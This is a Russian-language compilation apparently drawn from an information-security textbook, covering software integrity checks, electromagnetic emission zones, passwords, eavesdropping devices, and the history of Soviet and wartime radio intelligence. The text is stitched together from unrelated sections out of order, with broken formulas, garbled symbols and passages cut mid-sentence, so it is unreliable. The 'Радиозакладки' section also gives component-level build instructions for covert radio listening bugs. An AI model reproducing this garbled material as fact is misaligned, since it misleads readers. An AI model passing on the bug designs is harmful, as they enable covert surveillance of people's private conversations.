При организации защиты программ особое внимание должно уделяться защите общесистемных компонентов программного обеспечения и, прежде всего, — операционных систем, систем управления базами данных и программ сетевых протоколов. Наиболее распространенным способом защиты таких компонентов является выделение специального режима функционирования процессора (режима управления), и изоляции программ пользователей от работы в этом режиме.
Однако совокупности этих мер недостаточно для гарантированного перекрытия всех возможных каналов злоумышленных действий над общесистемными программными компонентами. Все рассмотренные средства, во-первых, не гарантируют распознавания (обнаружения) факта подмены общесистемных компонентов, во-вторых, не обеспечивают защиту от злоумышленных действий системных программистов, и, в-третьих, искусные злоумышленники могут преодолеть такую защиту. В связи с этим необходимо применять ряд дополнительных мер, основными из которых являются следующие.
1. Периодическая проверка программ по контрольным суммам, причем для повышения надежности проверок рекомендуется производить как общее (всего программного комплекса) контрольное суммирование, так и фрагментарное (отдельных блоков, отдельных строк, по заданному маршруту). При этом способ получения контрольной суммы рекомендуется сохранить в тайне.
2. Перезагрузка, т.е. периодическое обновление ранее загружаемых в ОП программ (или наиболее ответственных их компонентов), причем команды на обновление программ должны поддаваться особо защищаемой управляющей программой.
3. Организация специальных точек входа, т.е. нескольких нестандартных (сохраняемых в тайне и периодически изменяемых) адресов обращения к программам и их отдельным блокам.
4. Дублирование программ с обязательным сравнение перед исполнением, хотя бы двух копий защищаемых программ.
5. Криптографическое закрытие программ, причем снятие шифра должно осуществляться непосредственно перед использованием.
Все перечисленные меры сравнительно несложно реализуются программным путем, причем содержание соответствующих программ очевидно.
Наиболее эффективным методом предупреждения несанкционированного использования программ является метод модульного диалога, суть которого может быть представлена следующим образом.
При разработке каждого программного модуля в нем предусматриваются некоторые скрытые процедуры (сложение по модулю некоторых четных разрядов предъявленного кода или т.п.). Команды этих процедур шифруются и располагаются в определенных местах модуля, сохраняясь в тайне. Кроме того, определяется некоторый код, являющийся функцией содержания модуля (например, совокупность разрядов, выбранных из процедур модуля в определенном порядке). Этот код хранится в защищенном поле памяти. Тогда при обращении к модулю может быть осуществлена дополнительная проверка, как на санкционированность обращения, так и на подмену программ и внесения в них несанкционированных изменений.Для повышения уровня защиты контрольные процедуры и контрольные коды могут периодически изменяться.
Промежуточная зона
Под промежуточной зоной понимается область пространства вокруг излучателя, в котором расстояние r от излучателя до измерительной антенны соизмеримо с длиной волны l. Это означает, что ни одним из слагаемых в (11.3) пренебрегать нельзя. В данной зоне формула для расчета электрической составляющей поля имеет вид:
E = A,
где A = r I l/2 — энергетический коэффициент.
На рис. 11.5 и 11.6 представлены графики зависимостей составляющих напряженности электрического поля от расстояния до точки наблюдения на частотах 50 и 200 МГц. Видно, что вблизи источника преобладает квазистационарная составляющая E, которая обратно пропорциональна кубу расстояния до точки наблюдения (11.5), а в дальней зоне — составляющая поля излучения E, которая обратно пропорциональна расстоянию до точки наблюдения (11.6). В точке пересечения на удалении от источника, равном l/(2p), все три составляющие равны. С уменьшением длины волны данная точка смещается в сторону источника, что означает уменьшение размера ближней зоны.
 |  | ||
| Рис. 11.5. Напряженность электрического поля на частоте 50 Мгц | Рис. 11.6. Напряженность электрического поля на частоте 200 Мгц |
Взаимное сравнение вклада каждой из составляющих в амплитуду напряженности электрического поля позволяет определить границы зон с достаточной для практики точностью.
Расстоянием до границы ближней зоны r назовем расстояние от источника ПЭМИ, на котором максимальная составляющая E в x раз превосходит вклад составляющей E. В пределах данного расстояния можно пренебречь составляющими E и E и считать, что результирующая амплитуда электрической составляющей поля равна составляющей E.
Из уравнения E = xE можно получить искомое выражение до границы ближней зоны r = l/(2px). Аналогично, для границы дальней зоны получаем r = xl/2p.
Величина принятого предельного вклада составляющих поля x зависит от требуемой для практических расчетов точности и может составлять от 3 до 10.
На рис. 11.5 и 11.6 указаны границы ближней и дальней зон при x = 10.
На границе ближней (дальней) зоны можно ограничится значением x = 3, при котором в выражение (11.4) с учетом возведения члена в квадрат величинами E и E (E и E) можно пренебречь по сравнению с E (E). Так, для x = 3 граница ближней зоны составляет r = l/(6p), а граница дальней зоны — r = 3l/2p.
Ширина промежуточной зоны зависит от длины волны ПЭМИ и выбранной точности расчетов и равна
D = l
 Рис. 11.7. Зависимость расстояний до границ зон от частоты ПЭМИ при x= 3 |
На рис. 11.7 представлены зависимости расстояний до границ ближней и дальней зон от частоты ПЭМИ при x = 3. Для стандартных (ГОСТ 16842-82) расстояний до измерителя, равных 1, 3 и 10 м на измеряемой частоте можно определить, в какой зоне располагается измеритель.
Глава 12
Методы и средства несанкционированного получения информации…
по техническим каналам
Простое опознавание пользователя
Наиболее распространенной и просто реализуемой процедурой является опознавание по коду или паролю. Под кодом (паролем) понимается некоторая последовательность символов, сохраняемая в секрете и предъявляемая при обращении к системе. Коды (пароли) всех подлежащих опознаванию пользователей и устройств хранятся в ОП той АС, в которой осуществляется процедура опознавания. Символы пароля (кода) выбираются случайно. Однако важнейшей характеристикой пароля является его длина, поскольку при малой длине можно осуществить перебор всех возможных значений и таким образом получить несанкционированный доступ к системе.
Существует реальная возможность перехвата пароля в процессе его передачи по линии связи. Для устранения такой опасности можно прибегнуть к шифрованию пароля (кода). Однако при этом возникают дополнительные трудности, связанные с выбором, распределением, хранением и использованием ключей, поскольку знание злоумышленником системы шифрования и используемых ключевых установок сводит на нет эффект шифрования.
При работе с паролями должна соблюдаться и такая мера предосторожности, как предупреждение их распечатки или вывода на экран дисплеев. При этом понимается, что должны быть приняты особо тщательные и эффективные меры защиты паролей и кодов в ОП АС.
Проводные микрофоны
Проводные микрофоны устанавливаются в интересующем помещении и соединяются проводной линией с приемным устройством. Микрофоны устанавливаются либо скрытно (немаскированые), либо маскируются под предметы обихода, офисной техники и т.д. Такие системы обеспечивают передачу аудиосигнала на дальность до 20 м. При использовании активных микрофонов — до 150 м. Несколько микрофонов могут заводиться на общее коммутирующее устройство, позволяющее одновременно контролировать несколько помещений и осуществляющее запись перехваченных разговоров на диктофон.
Радиационные и химические методыполучения информации
Радиационные и химические методы получения информации — это сравнительно новые методы разведки, основывающиеся на материально-вещественном канале утечки информации. Они составляют целый комплекс мероприятий, которые включают в себя как агентурные мероприятия, так и применение технических средств.
К агентурным относятся предварительная проработка объекта и отбор проб для проведения лабораторных исследований.
К техническим средствам относятся космическая разведка, проведение экспресс-анализов объекта и исследование проб в лаборатории. Для проведения технической разведки широко используются различные дозиметры и анализаторы химического состава.
Химические и радиационные методы анализа в основном осуществляются над отходами производства (сточные воды, шлаки и т.д.). Кроме того, использование дозиметрических станций, индивидуальных дозиметров позволяет осуществлять контроль за продукцией, которую выпускает объект, если его производство связано с радиоактивными веществами.
Для экспресс-анализа химического состава в основном используются газоанализаторы и анализаторы химического состава жидкостей. Анализ грунта и других твердых компонентов проводится, как правило, над пробами в лабораторных условиях.
Для предприятий химической, парфюмерной, фармацевтической и иных сфер, связанных с разработкой и производством продукции, технологические процессы которых сопровождаются использованием или получением различных газообразных или жидких веществ, возможно образование каналов утечки информации через выбросы в атмосферу газообразных или сброс в водоемы жидких демаскирующих веществ.
Подобные каналы образуются с появлением возможности добывания демаскирующих веществ путем взятия злоумышленниками проб воздуха, воды, земли, снега, пыли на листьях кустарников, деревьев и травяном покрове в окрестностях организации.
В зависимости от направления и скорости ветра, демаскирующие вещества в газообразном виде или в виде взвешенных твердых частиц могут распространяться на расстояние нескольких десятков километров, что вполне достаточно для взятия проб злоумышленниками.
Аналогичное положение наблюдается и для жидких отходов.
Конечно, концентрация демаскирующих веществ при удалении от источника убывает. Однако при их утечке за достаточно продолжительный период концентрация может превышать предельные допустимые значения за счет накопления демаскирующих веществ в земле, растительности, подводной флоре и фауне.
Отходы могут продаваться другим предприятиям для использования в производстве иной продукции, очищаться перед сбросом в водоемы, уничтожаться или подвергаться захоронению на время саморазложения или распада. Последние операции используются для высокотоксичных веществ, утилизация которых иными способами экономически нецелесообразна, и для радиоактивных отходов, которые невозможно нейтрализовать физическими или химическими способами.
Утечка информации о радиоактивных веществах может осуществляться в результате выноса радиоактивных веществ сотрудниками организации или регистрации злоумышленником их излучений с помощью соответствующих приборов.
Дальность канала утечки информации о радиоактивных веществах через их излучения невелика: для ?-излучний она составляет в воздухе несколько миллиметров, ?-излучений — несколько сантиметров и только ?-излучения можно регистрировать на расстоянии в несколько сотен метров от источника излучений.
Глава 10
Линии связи
Радиоразведка
К числу удачных операций, проведенных в интересах российской радиоразведки в мирное время, можно отнести похищение кодовой книги американского посла в Румынии.
С началом войны в военном министерстве России были организованы дешифровальные отделения при всех штабах, армии и флотах. Опыт первых же военных действий убедил командование российских войск в необходимости создания станций перехвата, оснащенных соответствующим оборудованием и укомплектованных радистами и криптоаналитиками. Наиболее интенсивно это работа велась на Балтике. Уже в августе 1914 года на Балтийском побережье было создано несколько перехватывающих станций. Однако систематизация и обработка перехвата были в ведении районных станций, где перехваченные шифровки, как правило, залеживались и вовремя не обрабатывались из-за нехватки квалифицированного персонала.
Свою дешифровальную службу имел и департамент полиции России, главный орган политического сыска. Шифроперехват начал поступать в департамент полиции с фронта уже в августе 1914 года.
25 августа пришла депеша от военного губернатора Архангельска. В ней сообщалось, что там был задержан немецкий пароход, имевший радиотелеграфную станцию, причем в каюте радиста обнаружена шифротелеграмма. Последняя и была вместе с депешей направлена в Департамент для дешифрования.
Из других заслуживающих внимания событий в истории отечественной радиоразведки в первую мировую войну можно упомянуть захват российскими моряками кодовой книги с немецкого крейсера “Магдебург” в августе 1914 года и открытие школы перехвата в городе Николаеве в середине 1916 года.
Радиопеленгаторы, как средство радиоразведки, впервые появилась в действующих армиях в 1915–1916 годах. Радиопеленгаторная аппаратура внесла новое содержание в радиоразведку и принципиально расширила ее возможности. С ее помощью стали определять местонахождение радиостанций противника и тем самым устанавливать расположение штабов, частей и соединений, время начала и направление их перемещений. С применением радиопеленгаторов засекались выходы в эфир и координаты передатчиков вражеских агентов.
В самом начале первой мировой войны произошло событие, показавшее истинную цену удачно проведенной разведывательной операции. 26–28 августа 1914 года германская армия под командованием генерала Гинденбурга разгромила русскую армию генерала Самсонова около деревни Танненберг в 110 километрах от Варшавы. Силы были почти равными. Исход сражения решил перехват русских радиограмм, после расшифровки которых германские командования получило точные сведения о неудачной дислокации дивизий Самсонова. Немцы обнаружили свободный коридор между двумя русскими армиями, срочно подтянули силы, обошли армию Самсонова по флангу и нанесли сокрушительный удар. Русские войска были вынуждены отступить по свободному от противника коридору, где были встречены противником и окончательно разбиты. Свыше 90 тысяч солдат и офицеров попало в плен, около 30 тысяч было убито и ранено. Генерал Самсонов застрелился.
В конце 1914 года серьезную победу одержала британская разведка. В середине октября 1914 года штаб германского флота разработал план минирования устья Темзы. Данные радиоперехвата содержали указания времени проведения операции и количества задействованных эсминцев. Все они были атакованы английскими подводными лодками и были потоплены.
Белогвардейцы использовали радиоразведку очень активно и не без успеха. Временами только радиоразведка поставляла командованию Белой армии надежные сведения о положении в том или ином регионе России.
В начале 20-х годов Советское правительство серьезно занялось вопросом восстановления российской криптографической службы, полностью разрушившейся после революционных событий 1917 года. 5 мая 1921 года постановлением Советского правительства была создана криптографическая служба — Специальный отдел. А 25 августа 1921 года в ВЧК был издан приказ, который предписывал всем подразделениям в центре и на местах всякого рода шифры, ключи к ним и шифровки, обнаруженные при обысках и арестах, а также добытые через агентуру или случайно, направлять в Спецотдел. Большую роль в этот период сыграли знания и опыт криптографов со стажем.
С их активным участием при Спецотделе были организованы курсы, на которых изучались основы криптографии.
Первые годы функционирования Спецотдела были связаны с целым рядом трудностей из-за относительно невысокой общей подготовки его сотрудников, малочисленности личного состава и сложности, вызванной недостатком и низким качеством материалов для дешифрирования. Несовершенство радиоприемной аппаратуры, ее нехватка и сильная искаженность не могли обеспечить высокой достоверности текста перехватываемых шифровок. Перед руководством Спецотдела встала задача организации и налаживания работы всех звеньев дешифровальной службы, включая добычу шифроматериалов и техническое оснащение станций перехвата.
В конце 20-х годов сотрудники Спецотдела приняли активные участия в организации дешифровальной работы в Красной Армии. Итогом этих усилий стало создание в начале 30-х годов объединенного подразделения радиоразведки ОГПУ и 4-го управления Генштаба Красной Армии в рамках Спецотдела.
В 30-е годы Спецотдел стал одним из крупнейших технически оснащенных органов радиоразведки в мире. Он активно взаимодействовал с ОГПУ и 4-м управлением Генштаба, которые, следуя примеру спецслужб царской России, сделали приобретение шифроматериалов одним из основных своих приоритетов.
Дешифровальная секция Спецотдела была разбита на отделения по географическому и языковому принципу. Работала она весьма успешно.
В дешифровальной секции выделялись Иван Калинин, профессор Шунгский, а также Владимир Кривош-Неманич, который занимал достаточно высокий пост в дешифровальной службе департамента полиции и др.
Крупным успехом радиоразведки СССР в середине 30-х годов стало получение доступа к содержанию продолжительных переговоров министра иностранных дел Германии Риббентрона с японским военным атташе генералом Осима. Благодаря радиоразведке Москва получала полную информацию об этих переговорах.
В 1936 году несколько криптоаналитиков Спецотдела в месте с подразделением перехвата выехали в Испанию, где по прибытии сразу начали работу в составе Генштаба республиканской армии.
Постепенно дело наладилось, и республиканское военное командование вместе с советскими военными советниками стали получать все больше ценной информации.
Другая особая оперативная группа из числа сотрудников Спецотдела была направлена в Китай для оказания ему помощи в войне против Японии. Ежемесячно этой группе удавалось дешифровать около 200 японских шифротелеграмм, а всего за 1,5 года работы в Японии ею были вскрыты 10 войсковых шифров Японии.
Самым громким шпионским скандалом в период между двумя мировыми войнами стало дело польского ротмистра Ежи Сосновского, наделавшее много шума в Германии и развеявшее миф о неуязвимости немецкой контрразведки. Эффективность агентурной сети, созданной Сосновским, была необычно высокой, поскольку его агенты имели доступ к секретнейшим документам третьего рейха.
Наивысшего успеха Сосновский добивается, раздобыв так называемый “План А”. Это кодовое наименование носил план оперативного развертывания германских войск на границах с Польшей и Францией и последующих военных действиях. Ведь заполучить полный план сосредоточения вражеских вооруженных сил пока еще не удавалось никому, хотя это является заветной мечтой любого тайного агента любой разведки.
В папке с “Планом А”, помимо мобилизационных документов, содержались также материалы, которые свидетельствовали о явном нарушении Германией Версальского договора, в частности, планы формирования армии и создания дополнительных военных округов, частей сухопутных войск и пограничных отрядов на восточной границе. Поэтому похищенные документы имели колоссальное значение.
Второй победой Сосновского было получение материалов под названием “Кама” с подробностями секретных советско–германских военных соглашений, согласно которым немецкие летчики и танкисты проходили обучение в СССР в районе Липецка, где, кроме того, находился секретный полигон для испытания новейшей немецкой техники.
Следующая партия секретных документов касается моторизованных и танковых частей германских Вооруженных Сил.
Данные, содержащиеся в этих документах, дали практически полное представление о выходящем далеко за рамки Версальского договора развитии германской военной машины.
Одним из самых крупных и удачных советских разведчиков был Рихард Зорге (1895–1944). В начале 20-х годов стал работать в Германии на ГРУ, действуя под прикрытием учителя. В 1924–1927 годах Зорге находился в Москве. В 1927 году направлен для работы в скандинавские страны, в 1928 году — в Соединенные Штаты, в 1929 году — в Великобританию, а в 1930 году — в Шанхай.
С сентября 1933 года и вплоть до своего ареста в октябре 1944 года Зорге работал в Японии под прикрытием журналиста в качестве токийского корреспондента самой влиятельной немецкой газеты “Франкфурте Цайтунг” и двух других изданий. Он был вхож в германское посольство в Токио, японский Генеральный штаб и даже в императорское семейство, везде добывая ценнейшую военно-политическую информацию. Он также пытался отвратить японцев от планов войны с Советским Союзом.
В 1941 году Зорге сообщил в Москву, что японские армии собираются устремиться на юг Азии. Располагая этими данными и убедившись в то, что СССР не придется вести войну на два фронта, Сталин снял с Дальнего Востока крупные силы и перебросил их в европейскую часть Советского Союза для отражения германского наступления.
Радиоразведка во время Второй мировой войны
Немецкая радиоразведка против СССР во время второй мировой войны в стратегическом отношении была малоэффективна и не имела какого-либо существенного успеха. Когда Гитлер принял решение напасть на Советский Союз в 1940 году, у немцев на Востоке не было никаких технических средств для ведения радиоразведки. Спустя год, когда он начал войну с СССР, созданная с нуля немецкая служба перехвата уже приступила к добыванию информации о советских войсках. В результате материалы радиоразведки составляли для Германии основную массу (90%) всех разведданных о ходе военных действий на Восточном фронте.
С присущей им методичностью немцы разбили фронтовую линию на отрезки протяженностью от 100 до 150 км, каждый из которых обслуживался 1–2 радиоразведывательными ротами. Кроме того, в состав радиорот батальонов связи каждой пехотной дивизии были включены радиоразведывательные взводы, а на особо важных участках боевых действий дополнительно размещались стационарные радиоразведывательные пункты. Все эти подразделения вели усиленное наблюдение за радиопередатчиками противника, чтобы, не раскрывая факта осуществления перехвата, выявлять дислокацию его частей, местонахождение штабов, характер действий войск. Они также стремились навязать радиостанциям противника дезориентирующие радиограммы.
Одной из причин улучшения работы советской радиоразведки против Германии весной 1943 года стало совершенствование перехвата. С самого начала войны криптоаналитики НКГБ и ГРУ бились над вскрытием кода немецкой шифровальной машины “Энигма”. Сам факт, что англичане получали информацию благодаря чтению немецкой шифропереписки, вселял в советских криптоаналитиков надежду, что и им удастся добиться того же. Немецкая армия, флот, авиация — все пользовались шифромашинками “Энигма”, применяя различные ключи для различных целей в различных местах и в различное время. Начиная с 1941 года, в использовании одновременно находились не менее 50 различных ключей “Энигмы”, причем все они ежедневно менялись.
17 января 1943 года, еще до разгрома под Сталинградом, управление связи вермахта пришло к выводу о вскрытии “Энигмы” советскими криптоаналитиками.
Кроме того, через Овенса МИ- 5 ведет радиоигру, сообщая противнику ложные разведданные.
Руководители операции понимают, что перевербовать агентов противника выгоднее, чем судить, поскольку это приносит гораздо большую пользу для Великобритании. Так изучив задания засылаемых после 1940 года немецких агентов и выяснив, что им больше не поручается береговая рекогносцировка, английское командование делает вывод об отмене операции по высадке немецких войск на остров. В ходе “Двойной игры” МИ-5 было разоблачено 120 агентов германской разведки, из которых казнены 16. Британские спецслужбы действовали с таким мастерством, что на территории Великобритании не осталось ни одного перевербованного агента, а в Германии верили всей дезинформации, которую им навязывали англичане.
Операция продолжалась вплоть до окончания войны. Так в начале 1945 года немцев заставили поверить в преувеличенную мощь английских противолодочных средств. Итогом становится сокращение опасности, исходящей от немецких подводных лодок для союзных судов.
Наиболее выдающейся операцией Советской военной разведки (ГРУ), которая была проведена во время второй мировой войны является “Красная капелла”. Это немецкое название антифашистской группы сопротивления, а также разведывательной организации, действовавшей в годы войны в Германии и других оккупированных странах Европы. Организация, служившая для Советского Союза основным источником информации из оккупированной Германией Европы, состояла из нескольких действовавших независимо друг от друга групп, созданных в свое время ГРУ.
Разведывательная деятельность организации осуществлялась группами, существовавшими на территории Германии, оккупированных Бельгии, Франции и Нидерландов. Они поддерживали связь с группой “Люси”, еще одной советской разведывательной организацией, с центром в Швейцарии, группами в Испании и Югославии. Кураторами этих разведчиков были Леопольд Треппер и Анатолий Гуревич, в их распоряжении находились подготовленные радисты. Связь с Треппером и Гуревичем поддерживала Урсула Кучинская, позже помогавшая также Клаусу Фуксу и Александру Радо, ключевому члену и руководителю группы “Люси”.
Гуревич ( кадровый сотрудник ГРУ, оперативный псевдоним — “Кент”) руководил бельгийской группой в Брюсселе. Треппер (псевдоним – “Отто”) был европейским резидентом советской разведки.
Пост перехвата в немецком городе Кранце в Восточной Пруссии в ночь с 25 на 26 июля 1941 года записал неизвестные позывные. Когда пост перехвата в Кранце обнаружил неизвестный передатчик, в руководстве Абвера и даже немецкой службы, занимавшейся обезвреживанием вражеских передатчиков, не придали этому факту особого значения. С тех пор, как немецкие войска вступили на территорию Советского Союза, вся оккупированная Европа начала активные передачи. Наступление на Востоке явилось своего рода сигналом для радистов, и вполне логично было предположить, что их слушатель находится в Москве.
С почки зрения немцев, все шло как нельзя лучше, и появление в эфире новой подпольной рации ни на что не влияло. Вслед за Польшей, Данией, Норвегией, Голландией, Бельгией, Францией, Югославией и Грецией пришла очередь СССР пасть перед немецкими оккупантами. Какое значение имели какие-то разведывательные группы на фоне триумфов германского оружия? Но через несколько дней после регистрации неизвестных позывных пост перехвата в Кренце уловил сигналы еще одного передатчика. Местные специалисты, работающие во взаимодействии со своими коллегами из другого немецкого города Бреслау, попытались определить место его нахождения. Отчет о проделанной работе попал в Берлин. Там, ознакомившись с ним, содрогнулись, словно от удара. Сомнений не могло быть: подпольный радиопередатчик действовал в столице Германии.
Берлинский передатчик на какое-то время замолк. Не имея возможности выйти на берлинского радиста, в Абвере решили сосредоточиться на его двойнике: ритм позывных, выбор частот и время связи обоих были чрезвычайно похожи, видимо они обучались в одной и той же разведшколе. Тем временем специалисты из Кранца сжимали кольцо. Они исключили Германию и Францию, а затем Голландию. Оставалась Бельгия, а точнее город на побережье Брюгге.
Туда и отправилась группа немецких специалистов из Абвера.
Ночь с 12 на 13 декабря 1941 года ознаменовалась первым успехом. В доме на улице Атребатов в пригороде Брюсселя немцами были захвачены радист и шифровальщица. В оставленную в доме засаду попал и Треппер.
Арестованные упорно молчали, а шифровальщица покончила с собой. Треппера задержали но отпустили: немцы поверили “легенде”, под которой он жил и работал. Треппер (В Абвере его называли “Большой шеф”) успел предупредить об опасности своих товарищей.
30 июня 1942 года была раскрыта еще одна разведывательная группа, работавшая на территории Бельгии. Ее руководитель Иоганн Венцель, который за отличные знания в области радиотехники заслужил прозвище “профессор”, был схвачен рядом со своими передатчиком. Широкая осведомленность его о системе и шифре связи советских агентов, которую он обнаружил под пытками, позволила немцам расшифровать ранее перехваченные радиограммы.
14 июня 1942 года Абверу удалось расшифровать радиограмму от 10 октября 1941 года, которая гласила: “Встреча срочно Берлине по указанным адресам…”.
Службы безопасности Германии ринулись по трем указанным адресам. На следующий день были арестованы Шульце-Бойзен, и другие члены его группы. Около 85 человек было задержано в Гамбурге и более 100 в Берлине. 24 ноября 1942 г. был арестован Треппер.
Группа “Люси”, которая работала в Швейцарии, была там названа по оперативному псевдониму (Люси) Карла Седлачека, сотрудника чешской военной разведки, действовавшего и выдававшего себя за журналиста Томаса Шнезенгера. Одним из руководителей группы был Шандо Радо (псевдоним “Дора”) — резидент советской разведывательной группы в Швейцарии.
Члены группы соблюдали правила жесткой конспирации и общались друг с другом через связных, поэтому они за всю войну так ни разу между собой не встретились. Группа действовала просто блестяще. В частности, от нее советскому руководству поступила информация о том, что нападение Германии на СССР состоится 22 июня 1941 года.
Группа также сумела узнать и довести до командования точную дату начала германского наступления под Курском, что дало в руки обороняющимся советским войскам больше преимущества. Группа получала сведения непосредственно из германского главного командования почти регулярно, зачастую не позже, чем через двадцать четыре часа после принятия ежедневных решений относительно Восточного фронта. Невероятно, но информация, поступающая от группы, часто не воспринималась из-за недоверчивости руководства.
Власти Швейцарии терпели группу, потому, что она передавала информацию по Германии также и им. Но в ноябре 1943 года, возможно, из-за беспокойства в связи с нарушениями статуса своего нейтралитета и боязни навлечь на себя тяжелые последствия, служба безопасности Швейцарии арестовала некоторых разведчиков группы. Возможно, тем самым швейцарцы просто хотели уберечь разведчиков от германской СД.
В послевоенном исследовании ЦРУ, посвященном деятельности “Красной капеллы”, говорится, что переданные организацией сведения можно было бы использовать с большей выгодой. В исследовании ЦРУ также отмечается, что членов “Красной капеллы” следует искать в тех разведывательных группах, которые были созданы разведкой России в Европе еще до войны. Во время войны сеть увеличилась в размерах, а ее звенья, помимо Германии, появилась также в Бельгии, Голландии, Франции, Швейцарии и Италии. Кое-какие следы, — говорится в исследовании, — обнаружились в Англии, скандинавских странах, Восточной Европе, Соединенных Штатах и в других местах.
Серьезной победой Советской разведки является разведывательная операция по добыче основных секретов США.
В разведке атомного проекта участвовали и военная, и политическая разведки. Но главную роль играло 1-е управление НКГБ. Разведчики обеспечили огромный информационный поток о том, как идет работа над ядерным оружием в американских лабораториях. Спор о том, какую роль сыграла разведывательная информация в создании советской атомной бомбы не окончен. Заинтересованные стороны остаются при своем мнении.
Покойный академик Юлий Борисович Харитон, который долгие годы руководил созданием ядерного оружия, утверждал: “Разработка советской водородной бомбы от начала и до конца опиралась на идеи и соображения, высказанные советскими физиками, и на проведенные ими совместно с математиками расчеты”. Руководитель атомного проекта Игорь Курчатов считал, что славу ученые и разведчики должны поделить пополам. Сам Курчатов в феврале 1943 года еще не знал, может ли быть создана атомная бомба. Но ему показали материалы разведки, и они произвели на него серьезное впечатление.
Разведчики скромно говорят, что они лишь помогли ученым. Но помогли серьезно. Рассекреченные донесения, которые разведка передавала непосредственно Курчатову, представляли собой многостраничные отчеты, испещренные формулами, о ходе американских разработок. Курчатов показывал донесения своим коллегам. Они формулировали свои запросы, на то, что бы им еще хотелось узнать, и через некоторое время им приходил точный ответ на запрос.
Даже если наши физики, как они говорят, не получали от разведки ничего нового, то, как минимум, они убеждались в верности выбранного пути.
Мало известен факт, что в августе 1945 года, на следующий день после того, как американцы сбросили атомную бомбу на Хиросиму, из Москвы в советское посольство в Японии пришла шифротелеграмма с приказом немедленно отправиться в Хиросиму и посмотреть, что за бомбу применили американцы.
Советский Союз еще не вступил в войну с Японией, и два молодых офицера разведки с дипломатическими паспортами отправились в Хиросиму. Они там застали то, что все потом увидели в кинохронике: развалины, трупы, мертвых, уничтоженный город.
Выполняя приказ, они набили привезенные с собой мешки землей, городским мусором, пеплом. Мешки потом срочно отправили в Москву нашим ученым, которые сами создавали атомную бомбу.
Несколько лет назад получили звание Героя Российской Федерации пять разведчиков, принимавших участие в этой операции: Владимир Барковский, Леонид Квасников, Анатолий Яцков, Александр Феклисов и Леонтин Коэн, муж которой, Морис Коэн, тоже стал Героем, но по другому указу.
В 1945 году посол США в СССР Аверел Гарриман получил в подарок от пионеров Москвы вырезанный из дерева герб Соединенных Штатов. Герб украшал стену кабинета при четырех послах, и только в начале 50-х годов специалисты посольства по обнаружению скрытых электронных средств увидели в нем подслушивающее устройство. “Мы нашли его, но не знали принцип действия”, — вспоминает С. Питер Карлоу, начальник службы специального оборудования ЦРУ. — “В гербе находилось устройство, похожее на головастика с маленьким хвостиком. У Советов имелся источник длинноволнового сигнала, который заставлял датчики внутри герба резонировать”. Голос человека влиял на характер резонансных колебаний устройства, позволяя осуществлять перехват слов на расстоянии по организованному радиоканалу. “С технической точки зрения это устройство пассивного типа: ни тока, ни элементов питания, одно лишь пожизненное ожидание”.
После этой находки специалисты ЦРУ занялись воспроизведением подслушивающего устройства, основанного на совершенно новом для них принципе. Власти США молчали о гербе почти 10 лет и лишь в конце 1960 года сделали факт использования этого подслушивающего устройства достоянием гласности.
Радиозакладки
Радиозакладка, принципиальная схема которой представлена на рис. 12.2, имеет чувствительный микрофонный усилитель, позволяющий улавливать на расстоянии даже разговор, ведущийся вполголоса. Отличительная черта этой закладки — малое энергопотребление и миниатюрные размеры при радиусе действия в 50–70 м.
Рис. 12.2. Принципиальная схема типичной радиозакладки
Микрофон МКЭ-3 можно заменить на миниатюрный. Конденсатор С4 обеспечивает подстройку частоты передатчика УКВ-диапазона, а С5 — подстройку девиации. В качестве антенны используется многожильный провод длиной 30 см. Катушки L1 и L2 намотаны на феррите типоразмера к6 и содержат по 25 витков провода ПЭВ-0,2. Катушка L3 бескорпусная и имеет 6 витков посеребренного провода диаметром 0,5 мм, намотанного на оправе диаметром 7 мм. Рядом расположены 2 витка катушки L4 из того же провода. Питается закладка от двух дисковых аккумуляторов Д-0,1. Корпус можно выполнить из фольгированного стеклотекстолита.
Следующая закладка (рис. 12.3) реализована с применением операционного усилителя, что позволяет добиться высокой чувствительности и большой дальности перехвата звукового сигнала.
Рис. 12.3. Принципиальная схема радиозакладки с операционным усилителем
Диапазон рабочих частот: 60–65МГц. Радиус действия: до 100 м. Передатчик можно питать от 12,6 В (в этом случае вырастает дальность действия), но вместо микросхемы К140УД1А нужно установить микросхему К140УД1Б и на 30% увеличить номиналы деталей. Питание от аккумуляторов Д-0,1 или “Корунд”.
Потребление тока при питании при 6,6 В — 4,5 мА, при 12,6 В — 8 мА. Транзистор П403 можно заменить на П416, П422. В качестве микрофона можно использовать любой динамический микрофон. Подстройка частоты осуществляется подстроечным конденсатором С4. Катушка L1 намотана на каркасе без сердечника и содержит 6 витков провода ПЭЛ диаметром 0,6 мм (если провод посеребрить, КПД возрастает). Данный микропередатчик устойчиво работает при питании от 6,6 В до 12,6 В, необходимо только подстроить генератор на частоту УКВ-диапазона. Необходимо учесть некоторые рекомендации по настройке: транзисторы использовать с небольшим коэффициентом усиления. Собирать на печатных платах, используя как можно меньше навесного монтажа. При настройке подстроечных конденсаторов пользоваться деревянной лопаткой. Рекомендуется осуществить экранирование низкочастотной части от высокочастотной.
Распознавание событий
Процедура обучения, рассмотренная ранее, сама по себе является первым этапом распознавания события, связанного с работающим диктофоном. Однако в процессе обнаружения помимо работы диктофона встречается еще целый ряд событий, которые могут привести к превышению порога и вызвать сигнал тревоги, например, включение нового компьютера, вибрация, импульсная помеха, звонок телефона, помехи транспортные и т.д.
Поэтому ОД должен все эти события идентифицировать для того, чтобы организовать адекватную реакцию системы: при кратковременных помехах обнаружение на помеховых компонентах спектра должно отключаться, при долговременных — должны вносить изменения в шаблон.
В основу распознавания положена информация о спектре событий, полученная на этапе предварительных исследований.
Однако электромагнитная обстановка в крупных промышленных городах слишком разнообразна, чтобы распознавать все ситуации. Некоторые сигналы появляются и исчезают по случайному закону. Поэтому для исключения ложных тревог дополнительно приходится применять совершенно другой подход — многоканальную адаптивную фильтрацию.
Распространение звука в пространстве
Распространение звука в пространстве осуществляется звуковыми волнами. Упругими, или механическими, волнами называются механические возмущения (деформации), распространяющиеся в упругой среде. Тела, которые, воздействуя на среду, вызывают эти возмущения, называются источниками волн. Распространение упругих волн в среде не связано с переносом вещества. В неограниченной среде оно состоит в вовлечении в вынужденные колебания все более и более удаленных от источника волн частей среды.
Упругая волна является продольной и связана с объемной деформацией упругой среды, вследствие чего может распространяться в любой среде — твердой, жидкой и газообразной.
Когда в воздухе распространяется акустическая волна, его частицы образуют упругую волну и приобретают колебательное движение, распространяясь во все стороны, если на их пути нет препятствий. В условиях помещений или иных ограниченных пространств на пути звуковых волн возникает множество препятствий, на которые волны оказывают переменное давление (двери, окна, стены, потолки, полы и т.п.), приводя их в колебательный режим. Это воздействие звуковых волн и является причиной образования акустического канала утечки информации.
Акустические каналы утечки информации образуются за счет (рис. 6.4):
